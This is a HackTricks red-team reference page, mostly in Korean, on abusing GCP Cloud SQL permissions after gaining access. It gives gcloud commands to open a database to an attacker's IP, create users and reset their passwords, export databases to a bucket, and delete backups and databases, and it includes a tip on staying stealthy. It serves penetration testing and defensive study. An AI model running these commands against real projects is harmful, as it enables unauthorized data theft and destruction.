GCP - Cloud SQL Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Cloud SQL

Cloud SQL에 대한 자세한 정보는 다음을 확인하세요:

GCP - Cloud SQL Enum

`cloudsql.instances.update`, ( `cloudsql.instances.get`)

데이터베이스에 연결하려면 데이터베이스 포트에 대한 접근 권한과 사용자 이름 및 비밀번호를 알아야 하며, IAM 요구 사항은 없습니다. 따라서 데이터베이스에 공용 IP 주소가 있다고 가정할 때 접근하는 쉬운 방법은 허용된 네트워크를 업데이트하고 자신의 IP 주소가 접근할 수 있도록 허용하는 것입니다.

# Use --assign-ip to make the database get a public IPv4
gcloud sql instances patch $INSTANCE_NAME \
--authorized-networks "$(curl ifconfig.me)" \
--assign-ip \
--quiet

mysql -h <ip_db> # If mysql

# With cloudsql.instances.get you can use gcloud directly
gcloud sql connect mysql --user=root --quiet

**--no-backup**를 사용하여 데이터베이스의 백업을 중단하는 것도 가능합니다.

이것이 요구 사항이기 때문에 cloudsql.instances.connect 및 **cloudsql.instances.login**의 권한이 무엇인지 확실하지 않습니다. 아는 분은 PR을 보내주세요!

`cloudsql.users.list`

데이터베이스의 모든 사용자 목록을 가져옵니다:

gcloud sql users list --instance <intance-name>

`cloudsql.users.create`

이 권한은 데이터베이스 내에 새로운 사용자를 생성할 수 있게 해줍니다:

gcloud sql users create <username> --instance <instance-name> --password <password>

`cloudsql.users.update`

이 권한은 데이터베이스 내의 사용자 업데이트를 허용합니다. 예를 들어, 비밀번호를 변경할 수 있습니다:

gcloud sql users set-password <username> --instance <instance-name> --password <password>

`cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`

백업에는 오래된 민감한 정보가 포함될 수 있으므로 확인하는 것이 흥미롭습니다. 데이터베이스 내에서 백업 복원:

gcloud sql backups restore <backup-id> --restore-instance <instance-id>

더 은밀하게 수행하기 위해 현재 실행 중인 데이터베이스 대신 새 SQL 인스턴스를 생성하고 그곳에서 데이터를 복구하는 것이 권장됩니다.

`cloudsql.backupRuns.delete`

이 권한은 백업을 삭제할 수 있습니다:

gcloud sql backups delete <backup-id> --instance <instance-id>

`cloudsql.instances.export`, `storage.objects.create`

데이터베이스를 Cloud Storage Bucket에 내보내어 거기서 접근할 수 있도록 합니다:

# Export sql format, it could also be csv and bak
gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>

`cloudsql.instances.import`, `storage.objects.get`

Cloud Storage 버킷에서 데이터베이스 가져오기 (덮어쓰기):

# Import format SQL, you could also import formats bak and csv
gcloud sql import sql <instance-id> <gs://bucketName/fileName>

`cloudsql.databases.delete`

db 인스턴스에서 데이터베이스를 삭제합니다:

gcloud sql databases delete <db-name> --instance <instance-id>

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
해킹 트릭을 공유하려면 HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하세요.

PreviousGCP - Cloud Shell Post Exploitation NextGCP - Compute Post Exploitation

Last updated 1 month ago

Cloud SQL

cloudsql.instances.update, ( cloudsql.instances.get)

cloudsql.users.list

cloudsql.users.create

cloudsql.users.update

cloudsql.instances.restoreBackup, cloudsql.backupRuns.get

cloudsql.backupRuns.delete

cloudsql.instances.export, storage.objects.create

cloudsql.instances.import, storage.objects.get

cloudsql.databases.delete